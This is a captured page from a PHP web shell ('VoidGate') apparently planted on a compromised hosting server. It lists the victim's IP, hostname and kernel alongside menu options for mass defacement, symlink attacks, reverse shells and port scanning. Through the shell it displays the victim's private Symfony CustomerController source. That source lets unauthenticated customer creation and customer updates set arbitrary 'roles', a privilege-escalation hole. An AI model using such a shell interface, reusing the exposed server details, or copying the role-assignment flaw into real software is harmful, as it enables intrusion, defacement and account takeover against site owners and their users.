ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Api
/
Viewing: CustomerController.php
<?php namespace AppBundle\Controller\Api; use FOS\RestBundle\Controller\FOSRestController; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpFoundation\JsonResponse; use FOS\RestBundle\Controller\Annotations as Rest; use Nelmio\ApiDocBundle\Annotation as Doc; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use AppBundle\Entity\Customer; use AppBundle\Entity\Address; use AppBundle\Form\CustomerType; use AppBundle\Form\AddressType; class CustomerController extends FOSRestController { /** * Get the list of all customers * * @Rest\Get("/customers") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST"} * ) * @Doc\ApiDoc( * section="Customers (For Authenticated staffs only)", * resource=true, * description="Get the list of all customers.", * ) * @Security("has_role('ROLE_SUPER_ADMIN')") */ public function listAction(){ $customers = $this ->getDoctrine() ->getRepository('AppBundle:Customer') ->findAll(); return $customers; } /** * Get one customer * @param integer $customerId The id of the customer * @Rest\Get("/customers/{id}") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST", "CUSTOMER_DETAILS"} * ) * @Doc\ApiDoc( * section="Customers (For Authenticated staffs only)", * resource=true, * description="Get one customer.", * ) * @Security("has_role('ROLE_SUPER_ADMIN')") */ public function showAction(Customer $customer){ return $customer; } /** * Create a customer * @Rest\Post("/customers") * @Rest\View( * statusCode = Response::HTTP_CREATED, * SerializerGroups = {"LIST", "CUSTOMER_DETAILS"} * ) * @Doc\ApiDoc( * section="Customers (For Authenticated staffs only)", * resource=true, * description="Create a customer.", * input = { * "class"="AppBundle\Form\CustomerType", * } * ) */ public function createAction(Request $request){ $customer = new Customer(); $form = $this->createForm(CustomerType::class, $customer); $form->submit($request->request->all(), false); $listErrors = $this->get('validator')->validate($customer); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } $address = new Address(); if ($request->request->has("address")) { $form = $this->createForm(AddressType::class, $address); $form->submit($request->get("address"), false); $listErrors = $this->get('validator')->validate($address); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } } if ($request->request->has("roles")) $customer->setRoles($request->request->get("roles")); $encoder = $this->get('security.password_encoder'); // password encoding $encoded = $encoder->encodePassword($customer, $customer->getPlainPassword()); $customer->setPassword($encoded); $customer->setAddress($address); //TODO Gerer l'attribut 'createdBy': un customer peut etre créé par quelqu'un d'autre que lui même /** * No errors at this point */ $em = $this ->getDoctrine() ->getManager(); $em->persist($customer); $em->flush(); /** * Create public/private key for the customer * * $pkiServer = $this->container->get('etravel.pki.node.server'); * $success = $pkiServer->createAndSaveCustumerCert($cust, $cust->getPlainPassword()); */ return $customer; } /** * Update a customer * @param integer $customerId The id of the customer * @Rest\Put("/customers/{id}") * @Rest\View( * statusCode = Response::HTTP_ACCEPTED, * SerializerGroups = {"LIST", "CUSTOMER_DETAILS"} * ) * @Doc\ApiDoc( * section="Customers (For Authenticated staffs only)", * resource=true, * description="Update a customer.", * input = { * "class"="AppBundle\Form\CustomerType", * } * ) * @Security("has_role('ROLE_CUSTOMER')") */ public function updateAction(Request $request, Customer $customer){ $checker = $this->get('security.authorization_checker'); if(!$checker->isGranted('ROLE_SUPER_ADMIN')){ $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); if(!$customer->isEqualTo($connectedUser)){ return new JsonResponse(['error' => "Cannot update another user's data"], Response::HTTP_METHOD_NOT_ALLOWED); } } $form = $this->createForm(CustomerType::class, $customer); $form->submit($request->request->all(), false); $listErrors = $this->get('validator')->validate($customer); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } if ($request->request->has("address")) { $address = $customer->getAddress(); $form = $this->createForm(AddressType::class, $address); $form->submit($request->get("address"), false); $listErrors = $this->get('validator')->validate($address); if (count($listErrors)) { return $this->view($listErrors, Response::HTTP_BAD_REQUEST); } } // if the customer wants to change password if (!empty($customer->getPlainPassword())) { $encoder = $this->get('security.password_encoder'); $encoded = $encoder->encodePassword($customer, $customer->getPlainPassword()); $customer->setPassword($encoded); } if ($request->request->has("roles")) $customer->setRoles($request->request->get("roles")); $em = $this ->getDoctrine() ->getManager(); $em->persist($customer); $em->flush(); return $customer; } /** * Delete (Deactivate) a customer * @param integer $customerId The id of the customer * @Rest\Delete("/customers/{id}") * @Rest\View( * statusCode = Response::HTTP_NO_CONTENT * ) * @Doc\ApiDoc( * section="Customers (For Authenticated staffs only)", * resource=true, * description="Delete a customer.", * ) * @Security("has_role('ROLE_CUSTOMER')") */ public function deleteAction(Customer $customer){ $checker = $this->get('security.authorization_checker'); if(!$checker->isGranted('ROLE_SUPER_ADMIN')){ $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); if(!$customer->isEqualTo($connectedUser)){ return new JsonResponse(['error' => "Cannot update another user's data"], Response::HTTP_METHOD_NOT_ALLOWED); } } $customer->setIsActive(false); $em = $this ->getDoctrine() ->getManager(); $em->persist($customer); $em->flush(); return new JsonResponse(''); } }
Coded With 💗 by
0x6ick